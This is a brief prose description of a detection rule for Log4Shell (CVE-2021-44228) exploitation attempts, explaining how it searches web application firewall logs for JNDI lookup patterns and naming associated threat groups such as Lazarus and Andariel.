This rule detects potential exploitation attempts of the CVE-2021-44228 vulnerability, famously known as Log4Shell, which affects the Apache Log4j Java logging library and is capable of allowing remote code execution. The detection logic focuses on identifying suspicious patterns related to the use of JNDI (Java Naming and Directory Interface) within web application firewall logs. Notably, the rule looks for various ways the JNDI syntax may be exploited in logs from the /var/log directory, where compressed files may contain malicious payloads. It associates exploitation attempts with several threat actors, including well-known advanced persistent threat groups such as Andariel and Lazarus, indicating the widespread concern of this vulnerability being targeted in real-world attacks. The logic utilizes both keyword searches and regex expressions to catch the exploit patterns. The detection encompasses entries that contain specific sequences of characters that hint at an attempt to leverage JNDI for remote connection establishment, hence indicating an ongoing threat.